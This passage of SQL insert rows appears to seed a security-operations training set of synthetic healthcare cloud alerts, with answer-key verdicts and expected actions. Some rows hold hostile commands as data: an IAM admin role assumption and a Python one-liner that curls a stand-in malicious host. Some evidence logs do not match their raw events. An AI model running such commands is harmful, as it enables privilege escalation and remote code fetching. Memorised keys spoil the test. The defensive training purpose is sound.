/sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.935Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 
192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:05:23Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"54.172.98.101\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"john.doe\\\",\\\"hostname\\\":\\\"s3.amazonaws.com\\\",\\\"request_body\\\":\\\"GET /sensitive-bucket/records\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1399, 'Potential IAM Privilege Escalation Detected', 'critical', 'AWS GuardDuty', 'An IAM user attempted to assume an administrator role without prior authorization. This may indicate an internal attack or credential compromise.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T11:45:18Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"10.1.1.7\",\"username\":\"malicious_user\",\"hostname\":\"aws.amazon.com\",\"request_body\":\"\",\"command_line\":\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Known command for unauthorized privilege escalation\"}}],\"expected_actions\":[\"reset_credentials\",\"collect_forensics\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"IAM user attempting to escalate privileges without authorization is indicative of a potential insider threat or compromised account.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.936Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:45:18Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.15\\\",\\\"dst_ip\\\":\\\"10.1.1.7\\\",\\\"username\\\":\\\"malicious_user\\\",\\\"hostname\\\":\\\"aws.amazon.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"aws sts assume-role --role-arn arn:aws:iam::123456789012:role/Admin --role-session-name AdminSession\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1400, 'Suspicious Logins Detected from Foreign Location', 'medium', 'Azure Defender', 'Multiple failed login attempts were detected from an IP address located in a region not typically accessed by the user. May indicate a brute force or credential stuffing attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T09:33:47Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.56\",\"dst_ip\":\"192.168.3.10\",\"username\":\"jane.smith\",\"hostname\":\"login.microsoftonline.com\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 103 times for brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jane.smith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate user account\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"High number of failed login attempts from a foreign IP indicates a potential brute force attack.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 
ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.937Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T09:33:47Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.56\\\",\\\"dst_ip\\\":\\\"192.168.3.10\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"hostname\\\":\\\"login.microsoftonline.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1401, 'Exposed GCP Storage Bucket Detected', 'high', 'GCP SCC', 'An exposed GCP storage bucket was detected, which may lead to unauthorized access to sensitive healthcare data.', 'Data Exfil', 'T1537', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T08:20:45Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.27\",\"dst_ip\":\"10.0.0.5\",\"username\":\"n/a\",\"hostname\":\"storage.googleapis.com\",\"request_body\":\"GET /unsecured-bucket/medical-data\",\"command_line\":\"\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.27\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple data breaches\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"storage.googleapis.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Exposed cloud storage URL\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The exposed GCP storage bucket could lead to unauthorized data access, indicating a potential data breach.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET 
/unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.939Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T08:20:45Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.27\\\",\\\"dst_ip\\\":\\\"10.0.0.5\\\",\\\"username\\\":\\\"n/a\\\",\\\"hostname\\\":\\\"storage.googleapis.com\\\",\\\"request_body\\\":\\\"GET /unsecured-bucket/medical-data\\\",\\\"command_line\\\":\\\"\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1402, 'Lambda Function Misuse Detected in AWS', 'critical', 'AWS GuardDuty', 'A suspicious execution of a Lambda function was detected, possibly indicating an attempt to use AWS resources for unauthorized activities.', 'Execution', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T12:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.200\",\"dst_ip\":\"192.168.4.20\",\"username\":\"lambda-user\",\"hostname\":\"lambda.amazonaws.com\",\"request_body\":\"\",\"command_line\":\"python3 -c \'import os; os.system(\\\"curl http://malicious-site.com\\\")\'\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP involved in command and control activities\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"python3 -c \'import os; os.system(\\\"curl http://malicious-site.com\\\")\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for unauthorized resource use\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"Unauthorized command execution via Lambda function suggests potential misuse of AWS resources for malicious purposes.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.940Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"dst_ip\\\":\\\"192.168.4.20\\\",\\\"username\\\":\\\"lambda-user\\\",\\\"hostname\\\":\\\"lambda.amazonaws.com\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"python3 -c \'import os; os.system(\\\\\\\"curl http://malicious-site.com\\\\\\\")\'\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1403, 'Kubernetes Pod Abnormal Activity Detected', 'high', 'Prisma Cloud', 'Unusual network traffic patterns detected from a Kubernetes pod, which may indicate a compromised container or unauthorized access attempt.', 'Lateral Movement', 'T1570', 1, 'New', NULL, '{\"timestamp\":\"2026-03-02T13:30:29Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.1.50\",\"dst_ip\":\"10.0.2.50\",\"username\":\"kube-user\",\"hostname\":\"kube-cluster\",\"request_body\":\"\",\"command_line\":\"kubectl exec pod-name -- curl http://10.0.2.50\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.50\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"kubectl exec pod-name -- curl http://10.0.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Potential unauthorized lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Suspicious network activity from a Kubernetes pod may indicate an attempt to move laterally within the network.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl 
http://10.0.2.50\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.941Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:30:29Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"10.0.1.50\\\",\\\"dst_ip\\\":\\\"10.0.2.50\\\",\\\"username\\\":\\\"kube-user\\\",\\\"hostname\\\":\\\"kube-cluster\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"kubectl exec pod-name -- curl http://10.0.2.50\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1404, 'False Positive: Suspicious Domain Accessed', 'low', 'Wiz', 'A domain flagged as suspicious was accessed, but further investigation shows it is used for legitimate purposes.', 'Web', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-03-02T14:15:42Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.5.35\",\"dst_ip\":\"198.51.100.100\",\"username\":\"alice.wonder\",\"hostname\":\"healthcare-partner.com\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-02 03:11:55', '2026-03-02 13:55:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.35\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"healthcare-partner.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate domain for healthcare communications\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The domain was flagged as suspicious incorrectly, as it is used for legitimate business purposes.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.942Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 